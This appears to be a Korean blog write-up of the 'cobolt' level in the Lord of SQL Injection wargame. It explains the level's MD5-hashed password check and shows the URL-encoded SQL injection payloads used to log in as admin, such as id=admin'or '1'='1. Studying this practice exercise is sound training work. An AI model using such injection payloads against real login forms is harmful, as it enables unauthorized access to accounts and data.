SMALL
두번째 문제 cobolt이다 id와 pw이 get으로 받아 쿼리문을 날려주는데 md5로 암호화 시켜서 날려준다!
그리고 조건문에서는 id가 admin이면 문제가 해결이 된다.
https://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php?id=admin && pw=5f4dcc3b5aa765d61d8327deb882cf99
pw에 password를 md5암호화해서 넣어보았다. 그대로 결과값으로 나온것을 확인해 볼 수 있다.
https://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php?id=admin&& pw=1')or('1'='1
우선순위로 봤을때 이미 id와 pw에서 fasle가 떠서 아마 id가 admin이 아니라서 이렇게 뜨는것같다.
그렇다면 뒤에 pw를 무시하고 id에 admin을 넣을 방법을 찾다보니 이렇게 넣어 볼 수 있었다.
https://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php?id=admin'or '1'='1
클리어!
'Network > LOS' 카테고리의 다른 글
| [LOS_6]darkelf (0) | 2019.08.16 |
|---|---|
| [LOS_5]wolfman (0) | 2019.08.16 |
| [LOS_4]orc (0) | 2019.08.16 |
| [LOS_3]goblin (0) | 2019.08.16 |
| [LOS_1]gremlin (0) | 2019.08.16 |